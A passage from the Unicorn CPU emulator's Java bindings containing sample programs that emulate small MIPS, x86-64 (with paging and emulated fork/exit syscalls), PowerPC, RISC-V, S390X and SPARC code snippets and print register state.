Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh, 2015 */ /* Sample code to demonstrate how to emulate Mips code (big endian) */ package samples; import unicorn.*; public class Sample_mips implements UnicornConst, MipsConst { // code to be emulated public static final byte[] MIPS_CODE_EB = { 52, 33, 52, 86 }; // ori $at, $at, 0x3456 public static final byte[] MIPS_CODE_EL = { 86, 52, 33, 52 }; // ori $at, $at, 0x3456 // memory address where emulation starts public static final int ADDRESS = 0x10000; // callback for tracing basic blocks private static class MyBlockHook implements BlockHook { public void hook(Unicorn u, long address, int size, Object user_data) { System.out.format( ">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size); } } // callback for tracing instruction private static class MyCodeHook implements CodeHook { public void hook(Unicorn u, long address, int size, Object user_data) { System.out.format( ">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); } } public static void test_mips_eb() { long r1 = 0x6789L; // R1 register System.out.println("Emulate MIPS code (big-endian)"); // Initialize emulator in MIPS mode Unicorn u = new Unicorn(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN); // map 2MB memory for this emulation u.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory u.mem_write(ADDRESS, MIPS_CODE_EB); // initialize machine registers u.reg_write(UC_MIPS_REG_1, r1); // tracing all basic blocks with customized callback u.hook_add(new MyBlockHook(), 1, 0, null); // tracing one instruction at ADDRESS with customized callback u.hook_add(new MyCodeHook(), ADDRESS, ADDRESS, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. u.emu_start(ADDRESS, ADDRESS + MIPS_CODE_EB.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); r1 = u.reg_read(UC_MIPS_REG_1); System.out.format(">>> R1 = 0x%x\n", r1); } public static void test_mips_el() { long r1 = 0x6789L; // R1 register System.out.println("Emulate MIPS code (little-endian)"); // Initialize emulator in MIPS mode Unicorn u = new Unicorn(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN); // map 2MB memory for this emulation u.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory u.mem_write(ADDRESS, MIPS_CODE_EL); // initialize machine registers u.reg_write(UC_MIPS_REG_1, r1); // tracing all basic blocks with customized callback u.hook_add(new MyBlockHook(), 1, 0, null); // tracing one instruction at ADDRESS with customized callback u.hook_add(new MyCodeHook(), ADDRESS, ADDRESS, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. u.emu_start(ADDRESS, ADDRESS + MIPS_CODE_EL.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); r1 = u.reg_read(UC_MIPS_REG_1); System.out.format(">>> R1 = 0x%x\n", r1); } public static void main(String args[]) { test_mips_eb(); System.out.println("==========================="); test_mips_el(); } } unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_mmu.java000066400000000000000000000173431467524106700250270ustar00rootroot00000000000000package samples; import unicorn.*; public class Sample_mmu implements UnicornConst, X86Const { /** Code: *
     * mov rax, 57
     * syscall
     * test rax, rax
     * jz child
     * xor rax, rax
     * mov rax, 60
     * mov [0x4000], rax
     * syscall
     *
     * child:
     * xor rcx, rcx
     * mov rcx, 42
     * mov [0x4000], rcx
     * mov rax, 60
     * syscall
     * 
*/ private static final byte[] CODE = Utils.hexToBytes( "B8390000000F054885C0740FB83C00000048890425004000000F05B92A00000048890C2500400000B83C0000000F05"); private static final MemHook mmu_write_callback = (uc, type, address, size, value, user_data) -> { System.out.format("write at 0x%x: 0x%x\n", address, value); }; private static void x86_mmu_prepare_tlb(Unicorn uc, long vaddr, long tlb_base) { long cr0; long cr4; X86_MSR msr = new X86_MSR(0xC0000080); long pml4o = ((vaddr & 0x00ff8000000000L) >> 39) * 8; long pdpo = ((vaddr & 0x00007fc0000000L) >> 30) * 8; long pdo = ((vaddr & 0x0000003fe00000L) >> 21) * 8; long pml4e = (tlb_base + 0x1000L) | 1 | (1 << 2); long pdpe = (tlb_base + 0x2000L) | 1 | (1 << 2); long pde = (tlb_base + 0x3000L) | 1 | (1 << 2); uc.mem_write(tlb_base + pml4o, Utils.toBytes(pml4e)); uc.mem_write(tlb_base + 0x1000 + pdpo, Utils.toBytes(pdpe)); uc.mem_write(tlb_base + 0x2000 + pdo, Utils.toBytes(pde)); uc.reg_write(UC_X86_REG_CR3, tlb_base); cr0 = uc.reg_read(UC_X86_REG_CR0); cr4 = uc.reg_read(UC_X86_REG_CR4); msr.value = (Long) uc.reg_read(UC_X86_REG_MSR, msr); cr0 |= 1; //enable protected mode cr0 |= 1l << 31; //enable paging cr4 |= 1l << 5; //enable physical address extension msr.value |= 1l << 8; //enable long mode uc.reg_write(UC_X86_REG_CR0, cr0); uc.reg_write(UC_X86_REG_CR4, cr4); uc.reg_write(UC_X86_REG_MSR, msr); } private static void x86_mmu_pt_set(Unicorn uc, long vaddr, long paddr, long tlb_base) { long pto = ((vaddr & 0x000000001ff000L) >> 12) * 8; long pte = (paddr) | 1 | (1 << 2); uc.mem_write(tlb_base + 0x3000 + pto, Utils.toBytes((int) pte)); } private static SyscallHook x86_mmu_syscall_callback = (uc, userdata) -> { boolean[] parent_done = (boolean[]) userdata; long rax = uc.reg_read(UC_X86_REG_RAX); switch ((int) rax) { case 57: /* fork */ break; case 60: /* exit */ parent_done[0] = true; uc.emu_stop(); return; default: System.out.println("unknown syscall"); System.exit(1); } if (!parent_done[0]) { rax = 27; uc.reg_write(UC_X86_REG_RAX, rax); uc.emu_stop(); } }; public static void cpu_tlb() { long tlb_base = 0x3000; long rip; boolean[] parent_done = { false }; System.out.println( "Emulate x86 amd64 code with mmu enabled and switch mappings"); Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_64); uc.ctl_tlb_mode(UC_TLB_CPU); Unicorn.Context context = uc.context_save(); uc.hook_add(x86_mmu_syscall_callback, UC_X86_INS_SYSCALL, 1, 0, parent_done); // Memory hooks are called after the mmu translation, so hook the physicall addresses uc.hook_add(mmu_write_callback, UC_HOOK_MEM_WRITE, 0x1000, 0x3000, null); System.out.println("map code"); uc.mem_map(0x0, 0x1000, UC_PROT_ALL); // Code uc.mem_write(0x0, CODE); System.out.println("map parent memory"); uc.mem_map(0x1000, 0x1000, UC_PROT_ALL); // Parrent System.out.println("map child memory"); uc.mem_map(0x2000, 0x1000, UC_PROT_ALL); // Child System.out.println("map tlb memory"); uc.mem_map(tlb_base, 0x4000, UC_PROT_ALL); // TLB System.out.println("set up the tlb"); x86_mmu_prepare_tlb(uc, 0x0, tlb_base); x86_mmu_pt_set(uc, 0x2000, 0x0, tlb_base); x86_mmu_pt_set(uc, 0x4000, 0x1000, tlb_base); uc.ctl_flush_tlb(); System.out.println("run the parent"); uc.emu_start(0x2000, 0x0, 0, 0); System.out.println("save the context for the child"); uc.context_update(context); System.out.println("finish the parent"); rip = uc.reg_read(UC_X86_REG_RIP); uc.emu_start(rip, 0x0, 0, 0); System.out.println("restore the context for the child"); uc.context_restore(context); x86_mmu_prepare_tlb(uc, 0x0, tlb_base); x86_mmu_pt_set(uc, 0x4000, 0x2000, tlb_base); uc.reg_write(UC_X86_REG_RAX, 0L); uc.ctl_flush_tlb(); uc.emu_start(rip, 0x0, 0, 0); long parent = Utils.toLong(uc.mem_read(0x1000, Long.BYTES)); long child = Utils.toLong(uc.mem_read(0x2000, Long.BYTES)); System.out.format("parent result == %d\n", parent); System.out.format("child result == %d\n", child); } private static final TlbFillHook virtual_tlb_callback = (uc, addr, type, user_data) -> { boolean[] parent_done = (boolean[]) user_data; System.out.format("tlb lookup for address: 0x%X\n", addr); switch ((int) (addr & ~(0xfffL))) { case 0x2000: return 0x0L | UC_PROT_EXEC; case 0x4000: if (parent_done[0]) { return (0x2000L) | UC_PROT_READ | UC_PROT_WRITE; } else { return (0x1000L) | UC_PROT_READ | UC_PROT_WRITE; } default: return -1L; } }; public static void virtual_tlb() { long rip; boolean[] parent_done = { false }; System.out.println("Emulate x86 amd64 code with virtual mmu"); Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_64); uc.ctl_tlb_mode(UC_TLB_VIRTUAL); Unicorn.Context context = uc.context_save(); uc.hook_add(x86_mmu_syscall_callback, UC_X86_INS_SYSCALL, 1, 0, parent_done); // Memory hooks are called after the mmu translation, so hook the physicall addresses uc.hook_add(mmu_write_callback, UC_HOOK_MEM_WRITE, 0x1000, 0x3000, null); System.out.println("map code"); uc.mem_map(0x0, 0x1000, UC_PROT_ALL); // Code uc.mem_write(0x0, CODE); System.out.println("map parent memory"); uc.mem_map(0x1000, 0x1000, UC_PROT_ALL); // Parrent System.out.println("map child memory"); uc.mem_map(0x2000, 0x1000, UC_PROT_ALL); // Child uc.hook_add(virtual_tlb_callback, 1, 0, parent_done); System.out.println("run the parent"); uc.emu_start(0x2000, 0x0, 0, 0); System.out.println("save the context for the child"); uc.context_update(context); System.out.println("finish the parent"); rip = uc.reg_read(UC_X86_REG_RIP); uc.emu_start(rip, 0x0, 0, 0); System.out.println("restore the context for the child"); uc.context_restore(context); parent_done[0] = true; uc.reg_write(UC_X86_REG_RAX, 0); uc.ctl_flush_tlb(); uc.emu_start(rip, 0x0, 0, 0); long parent = Utils.toLong(uc.mem_read(0x1000, Long.BYTES)); long child = Utils.toLong(uc.mem_read(0x2000, Long.BYTES)); System.out.format("parent result == %d\n", parent); System.out.format("child result == %d\n", child); } public static final void main(String[] args) { cpu_tlb(); System.out.println("------------------"); virtual_tlb(); } } unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_ppc.java000066400000000000000000000056161467524106700250130ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* Sample code to demonstrate how to emulate S390X code */ package samples; import unicorn.*; public class Sample_ppc implements UnicornConst, PpcConst { /** code to be emulated: * {@code add r26, r6, r3} */ private static final byte[] CODE = Utils.hexToBytes("7F461A14"); // memory address where emulation starts private static final long ADDRESS = 0x10000; private static final BlockHook hook_block = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size); }; private static final CodeHook hook_code = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); }; public static void test_ppc() { long r3 = 0x1234; // R3 register long r6 = 0x6789; // R6 register long r26 = 0x8877; // R26 register (result) System.out.println("Emulate PPC code"); Unicorn uc = new Unicorn(UC_ARCH_PPC, UC_MODE_PPC32 | UC_MODE_BIG_ENDIAN); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, CODE); // initialize machine registers uc.reg_write(UC_PPC_REG_3, r3); uc.reg_write(UC_PPC_REG_6, r6); uc.reg_write(UC_PPC_REG_26, r26); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing one instruction at ADDRESS with customized callback uc.hook_add(hook_code, ADDRESS, ADDRESS + CODE.length, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. uc.emu_start(ADDRESS, ADDRESS + CODE.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> r26 = 0x%x\n", uc.reg_read(UC_PPC_REG_26)); } public static final void main(String[] args) { test_ppc(); } } unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_riscv.java000066400000000000000000000362241467524106700253560ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* Sample code to demonstrate how to emulate S390X code */ package samples; import unicorn.*; public class Sample_riscv implements UnicornConst, RiscvConst { /** code to be emulated: *
     * $ cstool riscv64 1305100093850502
     *  0  13 05 10 00  addi   a0, zero, 1
     *  4  93 85 05 02  addi   a1, a1, 0x20
     * 
*/ private static final byte[] CODE = Utils.hexToBytes("1305100093850502"); // memory address where emulation starts private static final long ADDRESS = 0x10000; private static final BlockHook hook_block = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size); }; private static final CodeHook hook_code = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); }; private static final CodeHook hook_code3 = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); if (address == ADDRESS) { System.out.println("stop emulation"); uc.emu_stop(); } }; /* 00813823 sd s0,16(sp) 00000013 nop */ private static final byte[] CODE64 = Utils.hexToBytes("2338810013000000"); // 10000: 00008067 ret // 10004: 8082 c.ret // 10006: 0001 nop // 10008: 0001 nop private static final byte[] FUNC_CODE = Utils.hexToBytes("67800000828001000100"); public static void test_riscv() { long a0 = 0x1234L; long a1 = 0x7890L; System.out.println("Emulate RISCV code"); // Initialize emulator in RISCV64 mode Unicorn uc = new Unicorn(UC_ARCH_RISCV, UC_MODE_RISCV32); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, CODE); // initialize machine registers uc.reg_write(UC_RISCV_REG_A0, a0); uc.reg_write(UC_RISCV_REG_A1, a1); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing all instruction uc.hook_add(hook_code, 1, 0, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. uc.emu_start(ADDRESS, ADDRESS + CODE.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> A0 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A0)); System.out.format(">>> A1 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A1)); } public static void test_riscv2() { long a0 = 0x1234L; long a1 = 0x7890L; System.out.println("Emulate RISCV code: split emulation"); // Initialize emulator in RISCV64 mode Unicorn uc = new Unicorn(UC_ARCH_RISCV, UC_MODE_RISCV32); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, CODE); // initialize machine registers uc.reg_write(UC_RISCV_REG_A0, a0); uc.reg_write(UC_RISCV_REG_A1, a1); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing all instruction uc.hook_add(hook_code, 1, 0, null); // emulate 1 instruction uc.emu_start(ADDRESS, ADDRESS + 4, 0, 0); System.out.format(">>> A0 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A0)); System.out.format(">>> A1 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A1)); // emulate one more instruction uc.emu_start(ADDRESS + 4, ADDRESS + 8, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> A0 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A0)); System.out.format(">>> A1 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A1)); } public static void test_riscv3() { long a0 = 0x1234L; long a1 = 0x7890L; System.out.println("Emulate RISCV code: early stop"); // Initialize emulator in RISCV64 mode Unicorn uc = new Unicorn(UC_ARCH_RISCV, UC_MODE_RISCV32); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, CODE); // initialize machine registers uc.reg_write(UC_RISCV_REG_A0, a0); uc.reg_write(UC_RISCV_REG_A1, a1); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing all instruction uc.hook_add(hook_code3, 1, 0, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. uc.emu_start(ADDRESS, ADDRESS + CODE.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> A0 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A0)); System.out.format(">>> A1 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A1)); } public static void test_riscv_step() { long a0 = 0x1234L; long a1 = 0x7890L; long pc = 0x0000L; System.out.println("Emulate RISCV code: step"); // Initialize emulator in RISCV64 mode Unicorn uc = new Unicorn(UC_ARCH_RISCV, UC_MODE_RISCV32); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, CODE); // initialize machine registers uc.reg_write(UC_RISCV_REG_A0, a0); uc.reg_write(UC_RISCV_REG_A1, a1); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing all instruction uc.hook_add(hook_code, 1, 0, null); // emulate 1 instruction uc.emu_start(ADDRESS, ADDRESS + CODE.length, 0, 1); pc = uc.reg_read(UC_RISCV_REG_PC); System.out.format(">>> A0 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A0)); System.out.format(">>> A1 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A1)); if (pc != 0x10004) { System.out.format( "Error after step: PC is: 0x%x, expected was 0x10004\n", pc); } // emulate one more instruction uc.emu_start(ADDRESS + 4, ADDRESS + 8, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> A0 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A0)); System.out.format(">>> A1 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A1)); } public static void test_riscv_timeout() { long a0 = 0x1234L; long a1 = 0x7890L; long pc = 0x0000L; System.out.println("Emulate RISCV code: timeout"); // Initialize emulator in RISCV64 mode Unicorn uc = new Unicorn(UC_ARCH_RISCV, UC_MODE_RISCV32); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory // TODO(nneonneo): what code was meant to go here? sample_riscv.c // has all zeros, but that just crashes without running into the // timeout... uc.mem_write(ADDRESS, new byte[8]); // initialize machine registers uc.reg_write(UC_RISCV_REG_A0, a0); uc.reg_write(UC_RISCV_REG_A1, a1); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing all instruction uc.hook_add(hook_code, 1, 0, null); // emulate 1 instruction with timeout uc.emu_start(ADDRESS, ADDRESS + 4, 1000, 1); pc = uc.reg_read(UC_RISCV_REG_PC); if (pc != 0x10000) { System.out.format( "Error after step: PC is: 0x%x, expected was 0x10004\n", pc); } // emulate 1 instruction with timeout uc.emu_start(ADDRESS, ADDRESS + 4, 1000, 1); pc = uc.reg_read(UC_RISCV_REG_PC); if (pc != 0x10000) { System.out.format( "Error after step: PC is: 0x%x, expected was 0x10004\n", pc); } // now print out some registers System.out.println(">>> Emulation done"); } public static void test_riscv_sd64() { long reg; System.out.println("Emulate RISCV code: sd64 instruction"); // Initialize emulator in RISCV64 mode Unicorn uc = new Unicorn(UC_ARCH_RISCV, UC_MODE_RISCV64); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, CODE64); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing all instruction uc.hook_add(hook_code, 1, 0, null); reg = ADDRESS + 0x100; uc.reg_write(UC_RISCV_REG_SP, reg); reg = 0x11223344; uc.reg_write(UC_RISCV_REG_S0, reg); // execute instruction uc.emu_start(0x10000, -1, 0, 1); // now print out some registers System.out.println(">>> Emulation done."); } private static final EventMemHook hook_memalloc = (uc, type, address, size, value, user_data) -> { long aligned_address = address & ~0xFFFL; int aligned_size = ((int) (size / 0x1000) + 1) * 0x1000; System.out.format( ">>> Allocating block at 0x%x (0x%x), block size = 0x%x (0x%x)\n", address, aligned_address, size, aligned_size); uc.mem_map(aligned_address, aligned_size, UC_PROT_ALL); // this recovers from missing memory, so we return true return true; }; public static void test_recover_from_illegal() { long a0 = 0x1234L; long a1 = 0x7890L; System.out.println("Emulate RISCV code: recover_from_illegal"); // Initialize emulator in RISCV64 mode Unicorn uc = new Unicorn(UC_ARCH_RISCV, UC_MODE_RISCV64); uc.reg_write(UC_RISCV_REG_A0, a0); uc.reg_write(UC_RISCV_REG_A1, a1); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // auto-allocate memory on access uc.hook_add(hook_memalloc, UC_HOOK_MEM_UNMAPPED, 1, 0, null); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing all instruction uc.hook_add(hook_code, 1, 0, null); // write machine code to be emulated to memory uc.mem_write(ADDRESS, CODE); // emulate 1 instruction, wrong address, illegal code try { uc.emu_start(0x1000, -1, 0, 1); throw new RuntimeException("emu_start should have failed!"); } catch (UnicornException e) { System.out.println("Expected Illegal Instruction error, got: " + e); } // emulate 1 instruction, correct address, valid code uc.emu_start(ADDRESS, -1, 0, 1); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> A0 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A0)); System.out.format(">>> A1 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A1)); } public static void test_riscv_func_return() { long pc = 0, ra = 0; System.out.println("Emulate RISCV code: return from func"); // Initialize emulator in RISCV64 mode Unicorn uc = new Unicorn(UC_ARCH_RISCV, UC_MODE_RISCV64); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, FUNC_CODE); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing all instruction uc.hook_add(hook_code, 1, 0, null); // set return address register // RET instruction will return to address in RA // so after RET, PC == RA ra = 0x10006; uc.reg_write(UC_RISCV_REG_RA, ra); // execute ret instruction uc.emu_start(0x10000, -1, 0, 1); pc = uc.reg_read(UC_RISCV_REG_PC); if (pc != ra) { System.out.format( "Error after execution: PC is: 0x%x, expected was 0x%x\n", pc, ra); if (pc == 0x10000) { System.out.println(" PC did not change during execution"); } } else { System.out.println("Good, PC == RA"); } // set return address register // C.RET instruction will return to address in RA // so after C.RET, PC == RA ra = 0x10006; uc.reg_write(UC_RISCV_REG_RA, ra); System.out.println("========"); // execute c.ret instruction uc.emu_start(0x10004, -1, 0, 1); pc = uc.reg_read(UC_RISCV_REG_PC); if (pc != ra) { System.out.format( "Error after execution: PC is: 0x%x, expected was 0x%x\n", pc, ra); if (pc == 0x10004) { System.out.println(" PC did not change during execution"); } } else { System.out.println("Good, PC == RA"); } // now print out some registers System.out.println(">>> Emulation done."); } public static final void main(String[] args) { test_recover_from_illegal(); System.out.println("------------------"); test_riscv(); System.out.println("------------------"); test_riscv2(); System.out.println("------------------"); test_riscv3(); System.out.println("------------------"); test_riscv_step(); // System.out.println("------------------"); // test_riscv_timeout(); System.out.println("------------------"); test_riscv_sd64(); System.out.println("------------------"); test_riscv_func_return(); } } unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_s390x.java000066400000000000000000000054411467524106700251130ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* Sample code to demonstrate how to emulate S390X code */ package samples; import unicorn.*; public class Sample_s390x implements UnicornConst, S390xConst { /** code to be emulated: * {@code lr %r2, %r3} */ private static final byte[] CODE = Utils.hexToBytes("1823"); // memory address where emulation starts private static final long ADDRESS = 0x10000; private static final BlockHook hook_block = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size); }; private static final CodeHook hook_code = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); }; public static void test_s390x() { long r2 = 2, r3 = 3; System.out.println("Emulate S390X code"); Unicorn uc = new Unicorn(UC_ARCH_S390X, UC_MODE_BIG_ENDIAN); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, CODE); // initialize machine registers uc.reg_write(UC_S390X_REG_R2, r2); uc.reg_write(UC_S390X_REG_R3, r3); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing one instruction at ADDRESS with customized callback uc.hook_add(hook_code, ADDRESS, ADDRESS + CODE.length, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. uc.emu_start(ADDRESS, ADDRESS + CODE.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> R2 = 0x%x\t\t>>> R3 = 0x%x\n", uc.reg_read(UC_S390X_REG_R2), uc.reg_read(UC_S390X_REG_R3)); } public static final void main(String[] args) { test_s390x(); } } unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_sparc.java000066400000000000000000000061171467524106700253360ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh, 2015 */ /* Sample code to demonstrate how to emulate Sparc code */ package samples; import unicorn.*; public class Sample_sparc implements UnicornConst, SparcConst { /** code to be emulated: * {@code add %g1, %g2, %g3} */ private static final byte[] SPARC_CODE = Utils.hexToBytes("86004002"); //public static final byte[] SPARC_CODE = Utils.hexToBytes("bb700000"); //illegal code // memory address where emulation starts private static final int ADDRESS = 0x10000; private static final BlockHook hook_block = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size); }; private static final CodeHook hook_code = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); }; public static void test_sparc() { long g1 = 0x1230L; // G1 register long g2 = 0x6789L; // G2 register long g3 = 0x5555L; // G3 register System.out.print("Emulate SPARC code\n"); // Initialize emulator in Sparc mode Unicorn u = new Unicorn(UC_ARCH_SPARC, UC_MODE_32 | UC_MODE_BIG_ENDIAN); // map 2MB memory for this emulation u.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory u.mem_write(ADDRESS, SPARC_CODE); // initialize machine registers u.reg_write(UC_SPARC_REG_G1, g1); u.reg_write(UC_SPARC_REG_G2, g2); u.reg_write(UC_SPARC_REG_G3, g3); // tracing all basic blocks with customized callback u.hook_add(hook_block, 1, 0, null); // tracing one instruction at ADDRESS with customized callback u.hook_add(hook_code, ADDRESS, ADDRESS, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. u.emu_start(ADDRESS, ADDRESS + SPARC_CODE.length, 0, 0); // now print out some registers System.out.print(">>> Emulation done. Below is the CPU context\n"); System.out.format(">>> G3 = 0x%x\n", u.reg_read(UC_SPARC_REG_G3)); } public static void main(String args[]) { test_sparc(); } } unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_tricore.java000066400000000000000000000054321467524106700256740ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* Sample code to demonstrate how to emulate TriCore code * Ported from the C version originally by Eric Poole , 2022 */ package samples; import unicorn.*; public class Sample_tricore implements UnicornConst, TriCoreConst { /** code to be emulated: * {@code mov d1, #0x1; mov.u d0, #0x8000} */ private static final byte[] CODE = Utils.hexToBytes("8211bb000008"); // memory address where emulation starts private static final long ADDRESS = 0x10000; private static final BlockHook hook_block = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size); }; private static final CodeHook hook_code = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); }; public 